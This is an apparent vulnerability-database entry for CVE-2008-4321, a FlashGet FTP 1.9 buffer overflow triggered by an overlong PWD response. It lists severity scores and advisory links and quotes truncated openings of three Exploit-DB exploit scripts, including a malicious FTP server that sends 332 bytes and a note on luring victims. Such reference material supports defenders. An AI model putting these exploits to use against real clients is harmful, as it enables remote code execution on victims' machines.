CVE-2008-4321
Published 2008-09-29
CVE-2008-4321: Buffer overflow in FlashGet (formerly JetCar) FTP 1.9 allows remote FTP servers to execute arbitrary code via a long response to the PWD command.
Priority: P347 · critical · 9.3 (CVSS 2.0)
AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 5.74% (92.1th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| flashget | flashget_ftp | — | — |
No detection rules found.
Exploit-DB
FlashGet 1.9.0.1012 - 'FTP PWD Response' Remote Buffer Overflow (SafeSEH)
exploitdb·2008-08-17
---
#!/usr/bin/perl
# k`sOSe 08/17/2008
# bypass safeseh using flash9f.ocx.
use warnings;
use strict;
use IO::Socket;
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
Exploit-DB
FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH Stack Overflow
exploitdb·2008-08-15
---
#!/usr/bin/perl
# FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit
# Coded By SkOd, skod.uk at gmail dot com
# Tested over Windows XP sp1 Hebrew
# link your victim to - ftp://localhost/somefile.TORRENT - over internet explorer.
##
# PoC by Krystian Kloskowski (h07)
# http://milw0rm.com/exploits/6240
##
# special thanks to a friend of mine who helped me
use IO::Socket;
####################################[ Parameters ]########################################
my $SHELLCODE =
Exploit-DB
FlashGet 1.9 - 'FTP PWD Response' Remote Buffer Overflow (PoC)
exploitdb·2008-08-13
---
#!/usr/bin/python
# FlashGet 1.9 (FTP PWD Response) 0day Remote Buffer Overflow PoC Exploit
# Bug discovered by Krystian Kloskowski (h07)
# Tested on: FlashGet 1.9 / XP SP2 Polish
# Product URL: http://www.flashget.com/en/download.htm?uid=undefined
# Details:..
#
# 257 "[AAAA..332]/" is current directory.\r\n N/A
# ----------------------------------------------------------------
# Just for fun ;]
##
from time import sleep
from socket import *
res = [
'220 WELCOME!! :x\r\n',
'331 Password required for %s.\r\n',
'230 User %s logged in.\r\n',
'250 CWD command successful.\r\n',
'257 "%s/" is current directory.\r\n' # <-- %s B0f :x
]
buf = 'A' * 332
s = socket(AF_INET, SOCK_STREAM)
s.bind(('0.0.0.0', 21))
s.listen(1)
print
No writeups or analysis indexed.
http://secunia.com/advisories/31481
http://securityreason.com/securityalert/4327
http://www.securityfocus.com/bid/30685
http://www.vupen.com/english/advisories/2008/2381
https://exchange.xforce.ibmcloud.com/vulnerabilities/44443
https://www.exploit-db.com/exploits/6240
https://www.exploit-db.com/exploits/6248
https://www.exploit-db.com/exploits/6256
Published: 2008-09-29